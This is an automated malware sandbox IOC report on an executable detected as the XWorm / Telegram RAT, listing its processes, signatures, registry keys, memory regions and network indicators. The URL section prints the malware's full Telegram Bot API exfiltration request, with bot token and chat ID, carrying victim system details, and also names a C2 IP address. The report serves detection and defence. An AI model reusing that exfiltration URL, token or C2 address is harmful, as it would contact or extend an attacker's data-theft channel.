Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\Mzo6BdEtGv.exe

"C:\Users\user\Desktop\Mzo6BdEtGv.exe"

Details

Is windows:	false
Is dropped:	false
PID:	7760
Target ID:	1
Parent PID:	3968
Name:	Mzo6BdEtGv.exe
Path:	C:\Users\user\Desktop\Mzo6BdEtGv.exe
Commandline:	"C:\Users\user\Desktop\Mzo6BdEtGv.exe"
Size:	76800
MD5:	068C99328320CAAA7C5F2D31B0FF214B
Time:	09:36:38
Date:	25/11/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0xe0000
Modulesize:	106496
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Yara detected Telegram RAT	Stealing of Sensitive Information, Remote Access Functionality
Yara detected XWorm	Stealing of Sensitive Information, Remote Access Functionality
Machine Learning detection for sample	AV Detection
Sample uses string decryption to hide its real strings	AV Detection
Yara detected Generic Downloader	Networking
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sample file is different than original file name gathered from version info	System Summary
Uses 32bit PE files	Compliance, System Summary
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Sample is known by Antivirus	System Summary
URLs found in memory or binary data	Networking
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

URLs

Name

Malicious

89.40.31.232

Details

Name:	89.40.31.232
TargetID:	0
From Memory:	false
Source:	config extractor

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Sample uses string decryption to hide its real strings	AV Detection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024

149.154.167.220

Details

Name:	https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024
IP:	149.154.167.220
TargetID:	1
From Memory:	false
Current Path:	C:\Users\user\Desktop\Mzo6BdEtGv.exe
Source:	network
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
IP address seen in connection with other malware	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

https://api.telegram.org/bot

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

Details

Name:	http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
TargetID:	1
From Memory:	true
Current Path:	C:\Users\user\Desktop\Mzo6BdEtGv.exe
Source:	Mzo6BdEtGv.exe, 00000001.00000002.3744158819.0000000002491000.00000004.00000800.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

Domains

Name

Malicious

api.telegram.org

149.154.167.220

Details

Name:	api.telegram.org
IP:	149.154.167.220
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Uses the Telegram API (likely for C&C communication)	Networking	Web Service
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

89.40.31.232

unknown

Romania

Details

IP:	89.40.31.232
TargetID:	1
Current Path:	C:\Users\user\Desktop\Mzo6BdEtGv.exe
Country:	Romania
Countrycode:	ROU
ASN number:	35512
ASN name:	TELEMEDIA-ASRO
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Sample uses string decryption to hide its real strings	AV Detection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

149.154.167.220

api.telegram.org

United Kingdom

Details

IP:	149.154.167.220
TargetID:	1
Current Path:	C:\Users\user\Desktop\Mzo6BdEtGv.exe
Country:	United Kingdom
Countrycode:	GBR
ASN number:	62041
ASN name:	TELEGRAMRU
Private:	false
Domain:	api.telegram.org

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Mzo6BdEtGv_RASMANCS

FileDirectory

There are 4 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

2491000

trusted library allocation

page read and write

E2000

unkown

page readonly

723000

trusted library allocation

page read and write

1B6DB000

stack

page read and write

1B35E000

heap

page read and write

7FF7C1476000

trusted library allocation

page execute and read and write

7FF7C1390000

trusted library allocation

page read and write

1B0000

heap

page read and write

7FF7C1394000

trusted library allocation

page read and write

7FF7C13BD000

trusted library allocation

page execute and read and write

710000

trusted library allocation

page read and write

2504000

trusted library allocation

page read and write

248E000

stack

page read and write

7FF7C13BB000

trusted library allocation

page execute and read and write

190000

heap

page read and write

7FF7C13EC000

trusted library allocation

page execute and read and write

780000

heap

page read and write

ADE000

stack

page read and write

7FF7C139D000

trusted library allocation

page execute and read and write

7FF7C13B0000

trusted library allocation

page read and write

1B2CA000

heap

page read and write

24F5000

trusted library allocation

page read and write

536000

heap

page read and write

7FF7C1440000

trusted library allocation

page read and write

53C000

heap

page read and write

7FF7C1560000

trusted library allocation

page execute and read and write

1D0000

heap

page read and write

1B46E000

stack

page read and write

2380000

heap

page read and write

1C220000

heap

page read and write

2A15000

trusted library allocation

page read and write

7FF7C1450000

trusted library allocation

page execute and read and write

2A19000

trusted library allocation

page read and write

88D000

stack

page read and write

1B26F000

stack

page read and write

7FF7C14B0000

trusted library allocation

page execute and read and write

1B16E000

stack

page read and write

1AE56000

stack

page read and write

760000

heap

page read and write

9D5000

heap

page read and write

1B060000

heap

page execute and read and write

530000

heap

page read and write

1C235000

heap

page read and write

1AA1C000

stack

page read and write

7FF7C1532000

trusted library allocation

page read and write

E0000

unkown

page readonly

4F1000

stack

page read and write

1AFDE000

stack

page read and write

1B29A000

heap

page read and write

59D000

heap

page read and write

1BC1E000

stack

page read and write

573000

heap

page read and write

1C91C000

stack

page read and write

7FF7C13A0000

trusted library allocation

page read and write

E0000

unkown

page readonly

7FF7C144C000

trusted library allocation

page execute and read and write

7FF4942D0000

trusted library allocation

page execute and read and write

520000

trusted library allocation

page read and write

7FF7C13B4000

trusted library allocation

page read and write

1A4C0000

trusted library allocation

page read and write

7FF7C1530000

trusted library allocation

page read and write

98C000

stack

page read and write

1C71B000

stack

page read and write

1AE90000

heap

page read and write

785000

heap

page read and write

1B368000

heap

page read and write

234E000

stack

page read and write

2A17000

trusted library allocation

page read and write

180000

heap

page read and write

7FF7C13AD000

trusted library allocation

page execute and read and write

7FF7C1540000

trusted library allocation

page read and write

1C11A000

stack

page read and write

F6000

unkown

page readonly

7FF7C1550000

trusted library allocation

page execute and read and write

9D0000

heap

page read and write

1C81A000

stack

page read and write

2AFF000

trusted library allocation

page read and write

1B5D0000

heap

page read and write

1C01F000

stack

page read and write

571000

heap

page read and write

1AF93000

stack

page read and write

1C218000

stack

page read and write

1B2B6000

heap

page read and write

2350000

heap

page execute and read and write

720000

trusted library allocation

page read and write

5A3000

heap

page read and write

1B31C000

heap

page read and write

1B310000

heap

page read and write

7FF7C1446000

trusted library allocation

page read and write

1AE93000

heap

page read and write

1A816000

heap

page read and write

12491000

trusted library allocation

page read and write

55C000

heap

page read and write

7FF7C13A3000

trusted library allocation

page read and write

7FF7C1393000

trusted library allocation

page execute and read and write

1B270000

heap

page read and write

1B336000

heap

page read and write

1B2CE000

heap

page read and write

There are 88 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
Mzo6BdEtGv.exe

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportMzo6BdEtGv.exe

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
Mzo6BdEtGv.exe